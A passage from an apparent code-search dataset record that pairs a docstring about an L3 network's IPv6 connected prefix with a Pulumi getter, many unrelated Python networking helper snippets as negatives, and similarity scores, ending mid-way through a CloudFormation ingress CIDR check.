"def isofy_ipv4(ip_string, prefix=\"\"):\n ipaddress.IPv4Address(ip_string) # fails for invalid IP\n\n if prefix != \"\":\n prefix_valid = bool(re.match(r\"^.{2}(\\..{4})*?$\", prefix))\n if not prefix_valid:\n raise ValueError(f\"{prefix} cannot be used as ISO prefix, please check formatting\")\n prefix += \".\"\n # IP: split and fill with 0s\n ip_parts = ip_string.split(\".\")\n padded = [p.zfill(3) for p in ip_parts]\n joined = \"\".join(padded)\n # IP: split to chunks à 4 chars\n chunksize = 4\n ip_chunks = [joined[i : i + chunksize] for i in range(0, len(joined), chunksize)]\n # combine\n iso_address = prefix + \".\".join(ip_chunks) + \".00\"\n return iso_address",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def source_cidr_block(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def min_addr(self):\n return self.vaddr",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def get_node_ip(self, prefix_db: openr_types.PrefixDatabase) -> Any:\n\n # First look for LOOPBACK prefix\n for prefix_entry in prefix_db.prefixEntries:\n if prefix_entry.type == network_types.PrefixType.LOOPBACK:\n return ipnetwork.sprint_addr(prefix_entry.prefix.prefixAddress.addr)\n\n # Else return None\n return None",
"def address_space_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def address_to_ip_prefix(address):\n return address.split('/')",
"def source_cidr_block(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def uuid_prefix(self) -> str:\n return str(self.uuid)[:-4]",
"def test_IPv4_to_CIDR(self):\n match_list = '1.2.3.0/29'\n self.assertEqual(helpers.IPRange_to_CIDR('1.2.3.1', '1.2.3.6'), match_list)",
"def get_network(address: str, netmask: str) -> IPv4Network:\n net = IPv4Network(f\"{address}/{netmask}\", strict=False)\n return net",
"def transit_router_cidr_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"transit_router_cidr_id\")",
"def ipv4_addresses(self) -> Dict[str, List[IPv4Address]]:\n log.debug(\"Host %s: ipv4 addresses of the devices interfaces %s.\", self.host, self._get_ipv4_addresses(\"self\"))\n return self._get_ipv4_addresses(\"self\")",
"def ipv4_enabled(self) -> bool:\n return pulumi.get(self, \"ipv4_enabled\")",
"def cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr_block\")",
"def address_space_prefixes(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def source_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"source_cidr_block\")",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def address(self):\n return f'Address = {self._peer.address}/{self._peer.subnet.prefixlen}'"
] | [
"0.748467",
"0.7397195",
"0.7397195",
"0.72900414",
"0.7255836",
"0.68101245",
"0.68101245",
"0.6797655",
"0.6686527",
"0.66722995",
"0.6519062",
"0.644197",
"0.64091825",
"0.64038914",
"0.6388208",
"0.63576555",
"0.6327051",
"0.6327051",
"0.6327051",
"0.6295223",
"0.6267015",
"0.6267015",
"0.6254608",
"0.62361073",
"0.62058383",
"0.61998755",
"0.6198242",
"0.6167111",
"0.6158947",
"0.6149186",
"0.61069787",
"0.6034688",
"0.6034688",
"0.60039353",
"0.599088",
"0.5910903",
"0.5910903",
"0.5890702",
"0.5837912",
"0.5837451",
"0.5831798",
"0.5831798",
"0.57978296",
"0.57978296",
"0.5758885",
"0.5756942",
"0.5753974",
"0.5752884",
"0.56977177",
"0.5688743",
"0.5688455",
"0.566763",
"0.56580764",
"0.56351525",
"0.5607291",
"0.5604963",
"0.56020474",
"0.55631715",
"0.5525816",
"0.55180234",
"0.54839665",
"0.5472659",
"0.5469961",
"0.54625165",
"0.5460016",
"0.54570067",
"0.54552466",
"0.54382735",
"0.5388508",
"0.5369542",
"0.5366072",
"0.5361888",
"0.5361888",
"0.5360986",
"0.5351798",
"0.53450537",
"0.5314042",
"0.5308127",
"0.5302534",
"0.5299187",
"0.5299187",
"0.52968633",
"0.5289738",
"0.52840203",
"0.5274408",
"0.5270567",
"0.52631235",
"0.5262026",
"0.5260581",
"0.5260497",
"0.52598244",
"0.5255794",
"0.52445245",
"0.52444124",
"0.52408457",
"0.5232279",
"0.5219829",
"0.5211037",
"0.5210617",
"0.52082485"
] | 0.7218586 | 5 |
The IPV6 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV6 or DualStack. | def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ipv6_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ipv6_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def ipv6_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def remote_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_cidr_block_association_id(self) -> str:\n return pulumi.get(self, \"ipv6_cidr_block_association_id\")",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def toV6(self):\n return V6Address.fromV4(self)",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def GlobalIpv6Address(self):\n if self.force_auto_sync:\n self.get('GlobalIpv6Address')\n return self._GlobalIpv6Address",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> str:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6Flag(self):\r\n\t\treturn self._get_attribute('ipv6Flag')",
"def Ipv6Srh(self):\r\n\t\treturn self._get_attribute('ipv6Srh')",
"def ipv6_gateway_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def ipv6_networks(view):\n return \"ipv6network?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def LinkLocalIpv6Address(self):\n if self.force_auto_sync:\n self.get('LinkLocalIpv6Address')\n return self._LinkLocalIpv6Address",
"def ipv6_gateway_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def get_ipv6_zone_connection(self):\n return self.m_connection.ipv6_zones",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6rate(self):\n\t\treturn self._get_attribute('ipv6rate')",
"def ipv6_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def get_ipv6_list():\n ipv6 = __grains__.get(\"ipv6\")\n\n return \" \".join([\"[\" + ip + \"]\" for ip in ipv6])",
"def get_main_ipv6():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)\n s.connect( ('2001:4860:4860::8888', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv6 address: %s\" % e)\n return None",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def to_network_v6(zone: Zone) -> ipaddress.IPv6Network:\n\n labels = zone.name.split(\".\")[:-3]\n\n zone_reverse_str = \"\".join(reversed(labels))\n if len(zone_reverse_str) % 4 != 0:\n for _ in range(4 - (len(zone_reverse_str) % 4)):\n zone_reverse_str += \"0\"\n prefix_str = \":\".join(\n [zone_reverse_str[i : i + 4] for i in range(0, len(zone_reverse_str), 4)]\n )\n prefix_str += f\"::/{len(labels) * 4}\"\n\n return ipaddress.IPv6Network(prefix_str, strict=True)",
"def ipv6_bandwidth(self):\n return self._ipv6_bandwidth",
"def _get_virtual_oper_VipV6_address(self):\n return self.__virtual_oper_VipV6_address",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def sc_subnet(self):\n return self._sc_subnet",
"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def ipv6_to_ipv4(ipv6_str):\n return '.'.join([str(b) for b in ipv6_str[12:]])",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def get_if_raw_addr6(iff):\n ip6 = get_if_addr6(iff)\n if ip6 is not None:\n return inet_pton(socket.AF_INET6, ip6)\n\n return None",
"def get_global_ip_ipv6():\n network_info_providers = [\n 'http://v6.ipv6-test.com/api/myip.php',\n 'http://v6.ident.me/',\n ]\n random.shuffle(network_info_providers)\n for url in network_info_providers:\n try:\n return requests.get(url).text.lstrip().rstrip()\n except Exception:\n continue\n else:\n log.info('cannot find global ipv6 ip')\n return \"\"",
"def get_intf_address(self, intf, pod, v6=False):\n if v6:\n cmd = [\"ifconfig \" + intf + \" | grep Global\"]\n output = pod.run_cmd_on_vm(cmd)\n ip6 = re.search(\n r'inet6\\s+addr\\s*:\\s*(\\S*)',\n output['ifconfig eth0 | grep Global'])\n ip6_addr = ip6.group(1)\n return ip6_addr\n cmd = [\"ifconfig \" + intf + \" | grep inet\"]\n output = pod.run_cmd_on_vm(cmd)\n ip = re.search(\n r'inet\\s+addr\\s*:\\s*(\\d+.\\d+.\\d+.\\d+)',\n output['ifconfig eth0 | grep inet'])\n ip_addr = ip.group(1)\n return ip_addr",
"def ipv6_addresses(self) -> Dict[str, List[IPv6Address]]:\n log.debug(\"Host %s: ipv6 addresses of the devices interfaces %s.\", self.host, self._get_ipv6_addresses(\"self\"))\n return self._get_ipv6_addresses(\"self\")",
"def test_ipv6_in_net(self):\n test_ip = ip_address.IPAddress(\"2001:0db8:85a3:08d3:1319:8a2e:0370:7344/24\")\n assert test_ip.in_network(\"2001:0d00::/24\")\n assert test_ip.in_network(\"2001:0d00::/29\")",
"def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def associate_ipv6_address(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"associate_ipv6_address\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def ipv6_addresses(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def ipv6_networkcontainers(view):\n return \"ipv6networkcontainer?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def c6(self):\n return self._c6",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def SupportsIPv6(self) -> bool:",
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def _FixIPv6Address(self, netblocks):\n new_list = []\n length = len(netblocks)\n if length > 0:\n number_ipv6 = 0\n for netblock in netblocks:\n if netblock.version == 4:\n new_list.append(netblock)\n elif netblock.version == 6:\n number_ipv6 += 1\n if number_ipv6 == length:\n return True, new_list\n return False, new_list",
"def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def NumberOfMappingIPV6Ranges(self):\r\n\t\treturn self._get_attribute('numberOfMappingIPV6Ranges')",
"def get_rug_address():\n net = netaddr.IPNetwork(ULA_PREFIX)\n return str(netaddr.IPAddress(net.first + 1))",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def enable_ipv6(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"enable_ipv6\")",
"def get_management_address(self, ensure_configuration=False):\n primary = self.get_interface(GENERIC_IFNAME + '0')\n prefix, prefix_len = ULA_PREFIX.split('/', 1)\n eui = netaddr.EUI(primary.lladdr)\n ip_str = str(eui.ipv6_link_local()).replace('fe80::', prefix[:-1])\n\n if not primary.is_up:\n self.up(primary)\n\n ip = netaddr.IPNetwork('%s/%s' % (ip_str, prefix_len))\n if ensure_configuration and ip not in primary.addresses:\n primary.addresses.append(ip)\n self.update_interface(primary)\n return ip_str",
"def ipv6(self, ipv6):\n\n self._ipv6 = ipv6",
"def assign_ipv6_address_on_creation(self) -> bool:\n return pulumi.get(self, \"assign_ipv6_address_on_creation\")",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def ipv4_to_ipv6(v6_network: Union[str, ipaddress.IPv6Network], v4_address: Union[str, ipaddress.IPv4Interface]):\n if isinstance(v6_network, str):\n v6_network = ipaddress.IPv6Network(v6_network)\n if isinstance(v4_address, str):\n v4_address = ipaddress.IPv4Address(v4_address)\n\n v6_address = v6_network[int(v4_address)]\n return ipaddress.IPv6Interface(f\"{v6_address}/{v6_network.prefixlen}\")",
"def ipv6_cmd(args):\n r = requete(\"Devices:get\")\n for i in r['status']:\n a = \"-\"\n if 'IPv6Address' in i:\n for j in i['IPv6Address']:\n if j['Scope'] != 'link':\n a = j['Address']\n b = \"-\"\n if 'IPAddress' in i: b = i['IPAddress']\n if a == \"-\": continue\n print(\"%4s %-32s %-5s %-16s %s\" % (i['Index'], i['Name'], i['Active'], b, a))",
"def OSSupportsIPv6(self) -> bool:",
"def ipv4(self):\n return Network(private=True).ipv4",
"def local_address(self) -> T_SockAddr:\n from anyio._core._sockets import convert_ipv6_sockaddr\n return convert_ipv6_sockaddr(self.raw_socket.getsockname())",
"def get_netmask(self):\n return self.get_ip_network().netmask",
"def is_net_ip6(value):\n for test in [lambda x: ipaddress.IPv6Network(x)._prefixlen != 128,\n lambda x: ipaddress.IPv6Interface(x)._prefixlen != 128]:\n try:\n return bool(test(value))\n\n except:\n pass\n\n return False",
"def filter_netmask(prefix):\n try:\n prefix_str = unicode(prefix)\n except NameError as ex:\n prefix_str = str(prefix)\n return IPv4Network(\"1.0.0.0/\"+prefix_str).netmask",
"def get_appgw_subnet_cidr(self) -> Union[str, None]:\n # determine the value of constants\n addon_consts = self.get_addon_consts()\n CONST_INGRESS_APPGW_ADDON_NAME = addon_consts.get(\"CONST_INGRESS_APPGW_ADDON_NAME\")\n CONST_INGRESS_APPGW_SUBNET_CIDR = addon_consts.get(\"CONST_INGRESS_APPGW_SUBNET_CIDR\")\n\n # read the original value passed by the command\n appgw_subnet_cidr = self.raw_param.get(\"appgw_subnet_cidr\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.addon_profiles and\n CONST_INGRESS_APPGW_ADDON_NAME in self.mc.addon_profiles and\n self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR) is not None\n ):\n appgw_subnet_cidr = self.mc.addon_profiles.get(\n CONST_INGRESS_APPGW_ADDON_NAME\n ).config.get(CONST_INGRESS_APPGW_SUBNET_CIDR)\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return appgw_subnet_cidr",
"def name(self):\n return 'Destination Options for IPv6'",
"def __init__(self, address, netmask=None):\n\n if netmask:\n ip = Ipv6Address(address)\n address = \"%s/%s\" % (ip,netmask)\n\n google.ipaddr.IPv6Network.__init__(self, address, strict=False)",
"def ip6_cidr_range(ingress, debug=False):\n if debug:\n print('ip6_cidr_range ' + str(ingress) + lineno())\n print('type: ' + str(type(ingress)) + lineno())\n if hasattr(ingress, '__dict__'):\n print('vars: ' + str(vars(ingress)) + lineno())\n\n suffix = \"/128\";\n\n if type(ingress) == type(dict()):\n\n if debug:\n print('ingress is a dict: ' + lineno())\n\n if 'CidrIp' in ingress:\n\n if debug:\n print('CiderIp in ingress '+lineno())\n\n if type(ingress['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n if sys.version_info[0] < 3 and type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif hasattr(ingress, 'cidrIpv6'):\n\n if type(ingress.cidrIpv6) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n else:\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n print('type: ' + str(type(ingress.cidrIpv6)) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n has_invalid_cidr = False\n\n for item in ingress.cidrIpv6:\n\n if debug:\n print('list item: ' + str(item) + lineno())\n\n if type(item) == type(dict()):\n\n for item2 in item:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item[item2]:\n return True\n\n elif item2 == 'Ref':\n return True\n\n elif item[item2].endswith(suffix):\n if debug:\n print('ip ends with /32' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /32' + lineno())\n return False\n\n elif 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif 